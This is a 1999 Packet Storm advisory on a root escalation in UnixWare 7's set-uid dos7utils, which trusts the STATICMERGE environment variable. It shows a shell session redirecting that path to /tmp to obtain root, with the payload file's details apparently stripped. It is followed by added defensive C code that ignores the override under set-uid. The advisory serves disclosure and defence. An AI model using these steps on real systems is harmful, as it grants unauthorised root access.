Type packetstorm
Reporter Packet Storm
Modified 1999-10-06T00:00:00


A vulnerability exists in the /usr/lib/merge/dos7utils program (suid root by
default) which allows any user to execute any command as root. The dos7utils
program gets its exec path from the environment variable STATICMERGE. By
setting this to a directory writable by us and setting the -f switch, we can
have dos7utils run our program as follows:

bash-2.02$ uname -a; id; pwd  
UnixWare fear71 5 7.1.0 i386 x86at SCO UNIX_SVR5  
uid=101(xnec) gid=1(other)  
bash-2.02$ export STATICMERGE=/tmp  
bash-2.02$ cat > /tmp/  
bash-2.02$ chmod 700 /tmp/   
bash-2.02$ ./dos7utils -f bah  
uid=0(root) gid=1(other)  

Searching through the SecurityFocus vulnerability archives yields 0 matches
for search string "unixware", but several for "openserver". I thought this
was rather strange, considering that SCO is discontinuing OpenServer after
5.0.5 in favor of the much more reliable (though not security-wise, evidently)
UnixWare 7. And so begins my audit of the virgin UnixWare 7 so soon after my
incomplete audit of SCO 5.0.5.

Brock Tellier  
UNIX Systems Administrator  
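
The check the advisory shows to be missing, as an added defensive example (not code from the advisory or from SCO): a set-uid program ignores an exec-path override taken from the environment, and an ordinary run accepts it only for a root-owned directory that others cannot write to. The names choose_helper_dir, dir_is_trusted and TRUSTED_DIR are hypothetical; the fixed directory is assumed from the install path named above.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* Assumption: helpers live in the install directory named in the advisory. */
#define TRUSTED_DIR "/usr/lib/merge"

/* Accept only an absolute path to a real directory (not a symlink) that is
   owned by root and not writable by group or other. Parent directories are
   not checked here. */
static int dir_is_trusted(const char *dir)
{
    struct stat st;

    if (dir == NULL || dir[0] != '/')
        return 0;
    if (lstat(dir, &st) != 0 || !S_ISDIR(st.st_mode))
        return 0;
    if (st.st_uid != 0)
        return 0;
    return (st.st_mode & (S_IWGRP | S_IWOTH)) == 0;
}

/* Hypothetical policy function. ruid/euid are parameters so the decision can
   be exercised without installing a setuid binary. */
const char *choose_helper_dir(uid_t ruid, uid_t euid, const char *env_dir)
{
    /* Set-uid execution: the invoking user controls the environment, so the
       override is ignored outright. */
    if (ruid != euid)
        return TRUSTED_DIR;
    /* Ordinary execution: honour the override only if the directory passes. */
    if (dir_is_trusted(env_dir))
        return env_dir;
    return TRUSTED_DIR;
}

int main(void)
{
    const char *dir = choose_helper_dir(getuid(), geteuid(),
                                        getenv("STATICMERGE"));
    printf("helpers would be run from %s\n", dir);
    return 0;
}
```

With uid 101 and euid 0, as in the session above, STATICMERGE=/tmp is discarded and the fixed directory is used.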